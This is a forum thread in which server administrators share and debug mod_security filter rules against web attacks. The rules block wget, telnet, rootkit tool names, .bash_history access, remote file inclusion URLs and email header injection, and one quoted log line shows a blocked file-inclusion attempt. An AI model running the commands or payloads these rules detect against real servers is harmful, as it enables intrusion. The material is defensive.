Mod_security

[procam]

Does anyone have anything to add to this that you feel is critically important for mod_security rules ??

# WEB-ATTACKS wget command attempt
SecFilterSelective THE_REQUEST "wget "
# WEB-ATTACKS uname -a command attempt
SecFilterSelective THE_REQUEST "uname -a"
# WEB-ATTACKS .htgroup access
SecFilterSelective THE_REQUEST "\.htgroup"
# WEB-ATTACKS .htaccess access
SecFilterSelective THE_REQUEST "\.htaccess"
# WEB-CLIENT Javascript URL host spoofing attempt
SecFilter "javascript\://"
# WEB-MISC cross site scripting \(img src=javascript\) attempt
SecFilter "img src=javascript"
# WEB-MISC cd..
SecFilterSelective THE_REQUEST "cd\.\."
# WEB-MISC ///cgi-bin access
SecFilterSelective THE_REQUEST "///cgi-bin"
# WEB-MISC /cgi-bin/// access
SecFilterSelective THE_REQUEST "/cgi-bin///"
# WEB-MISC /~root access
SecFilterSelective THE_REQUEST "/~root"
# WEB-MISC /~ftp access
SecFilterSelective THE_REQUEST "/~ftp"
# WEB-MISC htgrep attempt
SecFilterSelective THE_REQUEST "/htgrep" chain
SecFilter "hdr=/"
# WEB-MISC htgrep access
SecFilterSelective THE_REQUEST "/htgrep" log,pass
# WEB-MISC .history access
SecFilterSelective THE_REQUEST "/\.history"
# WEB-MISC .bash_history access
SecFilterSelective THE_REQUEST "/\.bash_history"
# WEB-MISC /~nobody access
SecFilterSelective THE_REQUEST "/~nobody"
# WEB-PHP PHP-Wiki cross site scripting attempt
SecFilterSelective THE_REQUEST "<script"
# WEB-PHP strings overflow
SecFilterSelective THE_REQUEST "\?STRENGUR"
# WEB-PHP PHPLIB remote command attempt
SecFilter "_PHPLIB\[libdir\]"
SecFilterSelective THE_REQUEST "cd /tmp "
SecFilterSelective THE_REQUEST "cd /var/tmp "
SecFilterSelective THE_REQUEST "telnet "
SecFilterSelective THE_REQUEST "cd /etc/httpd/proxy "
SecFilterSelective THE_REQUEST "vi\.recover "
SecFilterSelective THE_REQUEST "netenberg "
SecFilterSelective THE_REQUEST "psybnc "
SecFilterSelective THE_REQUEST "fantastico_de_luxe "
SecFilterSelective THE_REQUEST "perl (xpl\.pl|kut|viewde|httpd\.txt)"
SecFilterSelective THE_REQUEST "\./xkernel\;"
SecFilterSelective THE_REQUEST "/kaiten\.c"
SecFilterSelective THE_REQUEST "/mampus\?&(cmd|command)"

 

[procam]

These two rules are really helpful:

SecFilterSelective REQUEST_URI "=(http|www|ftp)\:/(.+)\.(c|dat|kek|gif|jpg|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\x20?\?"
SecFilterSelective REQUEST_URI "=(http|www|ftp)\:/(.+)\.(c|dat|kek|gif|jpg|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\?"

They basically block out URI's which have a URL as a GET variable (eg. index.php?file=http://www.example.com/example.txt). This is very useful, as it blocks out most of the recent Mambo exploits

Thank you~

 

[Daniel15]

These two rules are really helpful:

SecFilterSelective REQUEST_URI "=(http|www|ftp)\:/(.+)\.(c|dat|kek|gif|jpg|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\x20?\?"
SecFilterSelective REQUEST_URI "=(http|www|ftp)\:/(.+)\.(c|dat|kek|gif|jpg|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\?"

They basically block out URI's which have a URL as a GET variable (eg. index.php?file=http://www.example.com/example.txt). This is very useful, as it blocks out most of the recent Mambo exploits

EDIT: Forgot to write this: I can't take credit for these rules, they are in HostMerit's modsec ruleset: http://hostmerit.com/modsec.user.conf

 

[david510]

You must add mysql injection prevention rules also to this.

 

[procam]

These two rules are really helpful:

SecFilterSelective REQUEST_URI "=(http|www|ftp)\:/(.+)\.(c|dat|kek|gif|jpg|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\x20?\?"
SecFilterSelective REQUEST_URI "=(http|www|ftp)\:/(.+)\.(c|dat|kek|gif|jpg|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\?"

They basically block out URI's which have a URL as a GET variable (eg. index.php?file=http://www.example.com/example.txt). This is very useful, as it blocks out most of the recent Mambo exploits

EDIT: Forgot to write this: I can't take credit for these rules, they are in HostMerit's modsec ruleset: http://hostmerit.com/modsec.user.conf

These two rules disrupt normal operations of tgp/mgp sites ~~

 

[isputra]

HI,

I'm using http://hostmerit.com/modsec.user.conf as my rules but my client can't edit their wordpress theme editor.

The result always :

"Error 406, Not Acceptable. An appropriate representation of the requested resource /wp-admin/theme-editor.php could not be found on this server."

And the log on WHM Modsec link show :

Access denied with code 406. Pattern match "<script" at POST_PAYLOAD

So i comment the SecFilter "<script" like below :
# Weaker XSS protection but allows common HTML tags
#SecFilter "<script"

and the theme-editor.php works again.

Is there any security issue if i comment SecFilter "<script" like above ?

 

[isputra]

Anyone ?

Please give me a clue if i must add the rule again on my conf or maybe change by other rule that not break wordpress theme-editor.php

 

[docbreed]

Im having no luck adding an allow rule. If someone could look over and make sudjestions please.

url

http://www.domain.com/sm/admin/index.php?p=templates&Action=EditTemplate&TempID=2&Editing=1&SSID=xxvyipsq7igr7czxvo9k03

audit_log

==fd043b18==============================
Request: www.domain.com ip.ip.ip.ip - - [11/Jul/2007:16:05:59 -0500] "POST /sm/admin/index.php?p=templates&Action=EditTemplate&TempID=2&Save=Yes&SSID=xxvyipsq7igr7czxvo9k03 HTTP/1.1" 403 429 "http://www.domain.com/sm/admin/index.php?p=templates&Action=EditTemplate&TempID=2&Editing=1&SSID=xxvyipsq7igr7czxvo9k03" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4" - "-"
----------------------------------------
POST /sm/admin/index.php?p=templates&Action=EditTemplate&TempID=2&Save=Yes&SSID=xxvyipsq7igr7czxvo9k03 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 980
Content-Type: multipart/form-data; boundary=---------------------------18977768221793
Host: www.domain.com
Keep-Alive: 300
Referer: http://www.domain.com/sm/admin/index.php?p=templates&Action=EditTemplate&TempID=2&Editing=1&SSID=xxvyipsq7igr7czxvo9k03
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
mod_security-message: Access denied with code 403. Pattern match "file=http" at POST_PAYLOAD
mod_security-action: 403

980
-----------------------------18977768221793
Content-Disposition: form-data; name="Name"

test
-----------------------------18977768221793
Content-Disposition: form-data; name="Format"

2
-----------------------------18977768221793
Content-Disposition: form-data; name="TemplateID"

2
-----------------------------18977768221793
Content-Disposition: form-data; name="wysiwyg"

<html><head><title></title></head><body>test</body></html>
-----------------------------18977768221793
Content-Disposition: form-data; name="HTMLFile"

http://
-----------------------------18977768221793
Content-Disposition: form-data; name="HTMLContentFile"; filename=""
Content-Type: application/octet-stream


-----------------------------18977768221793
Content-Disposition: form-data; name="SubmitButton"

Save
-----------------------------18977768221793
Content-Disposition: form-data; name="RandomKey"

t4695377b6caf8
-----------------------------18977768221793--


HTTP/1.1 403 Forbidden
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
--fd043b18--

modsec.conf

<IfModule mod_security.c>
SecFilterEngine On
SecFilterCheckURLEncoding On
SecFilterForceByteRange 0 255
SecAuditEngine RelevantOnly
SecAuditLog logs/audit_log
SecFilterDebugLog logs/modsec_debug_log
SecFilterDebugLevel 0
SecFilterDefaultAction "deny,log,status:406"
SecFilterSelective REMOTE_ADDR "^127.0.0.1$" nolog,allow
Include "/usr/local/apache/conf/modsec.user.conf"
</IfModule>

modsec.user.conf
http://www.hostmerit.com/modsec.user.conf
with the #SecFilter "file=http" uncommented.

 

[Website Rob]

HI,

I'm using http://hostmerit.com/modsec.user.conf as my rules but my client can't edit their wordpress theme editor.

The result always :

"Error 406, Not Acceptable. An appropriate representation of the requested resource /wp-admin/theme-editor.php could not be found on this server."

And the log on WHM Modsec link show :

Access denied with code 406. Pattern match "<script" at POST_PAYLOAD

So i comment the SecFilter "<script" like below :
# Weaker XSS protection but allows common HTML tags
#SecFilter "<script"

and the theme-editor.php works again.

Is there any security issue if i comment SecFilter "<script" like above ?

Using Pattern match "<script" would not be a good idea for a whole lot of reasons.

Try this instead as it should help no matter what.

# Protecting from XSS attacks through the PHP session cookie
SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"

# phpBB XSS Protection
SecFilterSelective REQUEST_URI "/posting\.php\\?.*(<[[:space:]]*script|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/posting\.php\?mode=reply\&t=.*userid.*phpbb2mysql_t=(<[[:space:]]*script|(http|https|ftp)\:/)"

The last line is all one line.

 

[jameshsi]

Is there any rules for cgiemail ?
I got hackers use my form which using cgiemail to spam all the time.

 

[Website Rob]

Personally, I always recommend that 'cgiemail' be disabled.

With that being said, here are some mod_sec Rules that might help with preventing Spammers from using Form pages (of any kind) to send their Spam.


####################################
# Email Injection Header fix
####################################
SecFilter "bcc:"
SecFilterSelective THE_REQUEST "bcc:|bcc%3A"
SecFilterSelective ARG_Bcc ".*\@"
SecFilterSelective ARGS_VALUES "\n\s*bcc\:.*\@"

 

[fenixer]

SecFilterSelective REQUEST_URI "=(http|www|ftp)\:/(.+)\.(c|dat|kek|gif|jpg|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\x20?\?"
SecFilterSelective REQUEST_URI "=(http|www|ftp)\:/(.+)\.(c|dat|kek|gif|jpg|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\?"

They basically block out URI's which have a URL as a GET variable (eg. index.php?file=http://www.example.com/example.txt). This is very useful, as it blocks out most of the recent Mambo exploits

I have seen this rules also at:
http://www.gotroot.com/downloads/ftp/modsecurity/rootkits.conf

The question is they are already configured correctly (with so many others) in my modsec.user.conf, but they are useless..... NOT APLYING...

The 95% of the exploits uploaded and executed in my server proceeds from Joomla / Mambo, with much components (com_*.) that allows uploading files to 777 folder..... Due to the most of the Spammers apps launched at my server, this 95% exploits proceeds from URLs like:

index.php?file=http://www.example.com/example.txt

in other words, inyecting an external code to execute into a localhost php code.... in some other cases, downloading a file from an external URL into local folder to execute later...

I have tried several ways to see if I could get the modsec 403 executing something like index.php?file=http://www.example.com/example.txt into my server, but always allow........ I guess the rules are not being applyed....

Tried with www, with http, with different extensions.. no nothing, and as I said, 95% problems I am having are coming this way...

¿anyone can see this rules running in their machines? Why in my case I have several rules giving 403, but this two famous one does not?? Any idea??? (modsec goes me crazy!)

 

[Infopro]

anyone can see this rules running in their machines?

Absolutely, daily.

Example from the past hour.

[Mon Jul 30 06:35:46 2007] [error] [client scumbag.ip.goes.here] mod_security: Access denied with code 406. Pattern match "=(http|www|ftp)\\\\:/(.+)\\\\.(c|dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\\\\x20?\\\\?" at REQUEST_URI [id "390144"][rev "1"] [msg "Rootkit attack: Generic Attempt to install rootkit"] [severity "CRITICAL"] [hostname "www.customerdomain.com"] [uri "/forum/vbgsitemap/vbgsitemap-config.php?base=http://scumbagsdomain.com/figo.txt?"]

Using rootkits.conf, useragents.conf, and several others.

 

[fenixer]

Thanks so much infopro...

If you were so kind, would you let me see your modsec.user.conf... maybe publishing here or sending me an email to [email protected]

Thanks..... the problem is I cannot see this rule running for me at all, although my modsec is running (apache 1.x) and other rules does the same.

Any idea why these rules just cannot do the trick for my config?

 

[Infopro]

I think you'd do yourself some good to read up on all of this a bit more. By the time you get thru a few of those you'll find your problem I bet.
http://www.google.com/search?hl=en&q=cPanel+mod+security

What works for us may not be what will work for you on yours. As someone posted to a thread on these forums a while back, it's not exactly brain surgery.

It sounds to me (just guessing) that you may have added the rulesets but forget to 'enable' it by adding what makes it work inside your httpd.conf.

<IfModule mod_security.c>
#rulesets called from this location
</IfModule>

If you have that what do you have inside it? Don't need to see the entire file but from that area of your httpd.conf there are some things you do need to have for these rules to work at all. And of course if they're remarked out, are #bypassed.

Additionally, if you use chirpy's CSF you can check your mod sec logs for activity and even edit the rulesets directly from WHM.

http://www.configserver.com/cp/csf.html

Hope that helps.

 

[fenixer]

Sure, thanks infopro for your answer...

It was not... Modsec was running ok as well as all my rules configured.....

I thought that rule was not running (only that) because I tried to force it executing a URL expecting a 403, but I was not receiving that...

Now I can have a look at some logs and see it is applying correctly...... it was simply the way I was trying to force the 403...... certainly, I cannot force it as I thought I should do it.... nothing else.......

I thought simply executing an http://www.domain.tld/index.php?site=http://www.xxxx.tld would obtain a 403 error, but not........ ¿?¿? but in my case, I have seen some 403 due to this at audit_log, so I guess it is running ok in spite of...

Sorry too much for wasting your time, but thanks so much for your effort...

 

[jameshsi]

Hi!
I have this rule:

# Weaker XSS protection but allows common HTML tags
SecFilter "<script"

If for some reason, I want to disable this rule for one site, for example, mydomain.com , how should I do ?

Cause I want to submit a form and in that form, I need to filled in something like :

<script language="javascript" src="http://mydomain.com/plugins/jf/service/jf_create.php?code=bdbdc9bf9241b99d4c3abd0110aeea86"></script>

I am thinking either I disable the rule for forbidden the <script for only this site, or I create an allow rule for some patten match the URL of what I need to fill in the form to submit.

Any suggestion ?

 

[jameshsi]

Any suggestion ?

 

[Infopro]

Any suggestion ?

Only one, reread this thread from the top. The question was already answered properly I believe.